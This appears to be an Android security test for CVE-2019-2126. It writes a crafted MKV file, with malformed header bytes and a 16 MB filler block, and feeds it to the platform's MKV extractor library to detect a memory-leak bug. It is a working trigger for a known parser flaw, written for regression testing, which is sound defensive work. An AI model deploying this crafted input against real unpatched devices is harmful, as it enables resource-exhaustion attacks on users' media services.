1 /**
2 * Copyright (C) 2020 The Android Open Source Project
3 *
4 * Licensed under the Apache License, Version 2.0 (the "License");
5 * you may not use this file except in compliance with the License.
6 * You may obtain a copy of the License at
7 *
8 * http://www.apache.org/licenses/LICENSE-2.0
9 *
10 * Unless required by applicable law or agreed to in writing, software
11 * distributed under the License is distributed on an "AS IS" BASIS,
12 * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
13 * See the License for the specific language governing permissions and
14 * limitations under the License.
15 */
16 #include "../includes/common.h"
17 #include "../includes/memutils_track.h"
18 #include <datasource/DataSourceFactory.h>
19 #include <dlfcn.h>
20 #include <media/DataSource.h>
21 #include <media/IMediaHTTPService.h>
22 #include <media/stagefright/MediaExtractor.h>
23 #include <sys/mman.h>
24
25 unsigned char mkvDataStart[] = {
26 0x1A, 0x45, 0xDF, 0xA3, 0x10, 0x00, 0x00, 0x0A, 0x42, 0x82, 0x10, 0x00,
27 0x00, 0x04, 0x77, 0x65, 0x62, 0x6D, 0x18, 0x53, 0x80, 0x67, 0x10, 0xF4,
28 0x24, 0x49, 0x16, 0x54, 0xAE, 0x6B, 0x10, 0xF4, 0x24, 0x41, 0xAE, 0x10,
29 0xF4, 0x24, 0x3C, 0xD7, 0x81, 0x01, 0x83, 0x81, 0x01, 0xE0, 0x10, 0x00,
30 0x00, 0x03, 0xB0, 0x81, 0x01, 0x6D, 0x80, 0x10, 0xF4, 0x24, 0x28, 0x62,
31 0x40, 0x10, 0xF4, 0x24, 0x22, 0x50, 0x34, 0x10, 0xF4, 0x24, 0x19, 0x42,
32 0x54, 0x81, 0x01, 0x42, 0x55, 0x10, 0xF4, 0x24, 0x00};
33
34 unsigned char mkvDataEnd[] = {0x42, 0x55, 0x81, 0x61, 0x42, 0x54,
35 0x88, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF,
36 0xFF, 0xFF, 0xFF, 0x50, 0x35, 0x80};
37
38 #define LIBNAME "/system/lib64/extractors/libmkvextractor.so"
39 #define LIBNAME_APEX \
40 "/apex/com.android.media/lib64/extractors/libmkvextractor.so"
41
42 #define LEAK_SIZE 16000000
43 #define LEAK_DATA 0x61
44 #define TMP_FILE "/data/local/tmp/temp_cve_2019_2126"
45
46 using namespace android;
47
is_tracking_required(size_t size)48 bool is_tracking_required(size_t size) { return (size == LEAK_SIZE); }
49
main()50 int main() {
51
52 #if _64_BIT
53 GetExtractorDef getDef = nullptr;
54 FILE *fp = fopen(TMP_FILE, "wb");
55 if (!fp) {
56 return EXIT_FAILURE;
57 }
58
59 char *appendArray = (char *)malloc(LEAK_SIZE);
60 memset(appendArray, LEAK_DATA, LEAK_SIZE * sizeof(char));
61
62 /* Write mkv stream */
63 fwrite(mkvDataStart, 1, sizeof(mkvDataStart), fp);
64
65 /* Append a bitstream which causes memory leak */
66 fwrite(appendArray, 1, LEAK_SIZE, fp);
67 fwrite(mkvDataEnd, 1, sizeof(mkvDataEnd), fp);
68 free((void *)appendArray);
69 fclose(fp);
70
71 void *libHandle = dlopen(LIBNAME, RTLD_NOW | RTLD_LOCAL);
72 if (!libHandle) {
73 libHandle = dlopen(LIBNAME_APEX, RTLD_NOW | RTLD_LOCAL);
74 if (!libHandle) {
75 remove(TMP_FILE);
76 return EXIT_FAILURE;
77 }
78 }
79
80 getDef = (GetExtractorDef)dlsym(libHandle, "GETEXTRACTORDEF");
81 if (!getDef) {
82 remove(TMP_FILE);
83 dlclose(libHandle);
84 return EXIT_FAILURE;
85 }
86
87 sp<DataSourceFactory> dsf = DataSourceFactory::getInstance();
88 sp<DataSource> dataSource = dsf->CreateFromURI(NULL, TMP_FILE);
89 if (dataSource == nullptr) {
90 remove(TMP_FILE);
91 dlclose(libHandle);
92 return EXIT_FAILURE;
93 }
94
95 void *meta = nullptr;
96 void *creator = nullptr;
97 FreeMetaFunc freeMeta = nullptr;
98 float confidence;
99 if (getDef().def_version == EXTRACTORDEF_VERSION_NDK_V1) {
100 creator = (void *)getDef().u.v2.sniff(dataSource->wrap(), &confidence,
101 &meta, &freeMeta);
102 } else if (getDef().def_version == EXTRACTORDEF_VERSION_NDK_V2) {
103 creator = (void *)getDef().u.v3.sniff(dataSource->wrap(), &confidence,
104 &meta, &freeMeta);
105 }
106 if (!creator) {
107 remove(TMP_FILE);
108 dlclose(libHandle);
109 return EXIT_FAILURE;
110 }
111
112 CMediaExtractor *ret = ((CreatorFunc)creator)(dataSource->wrap(), meta);
113 if (ret == nullptr) {
114 remove(TMP_FILE);
115 dlclose(libHandle);
116 return EXIT_FAILURE;
117 }
118
119 if (meta != nullptr && freeMeta != nullptr) {
120 freeMeta(meta);
121 }
122
123 remove(TMP_FILE);
124 dlclose(libHandle);
125 #endif /* _64_BIT */
126
127 return EXIT_SUCCESS;
128 }
129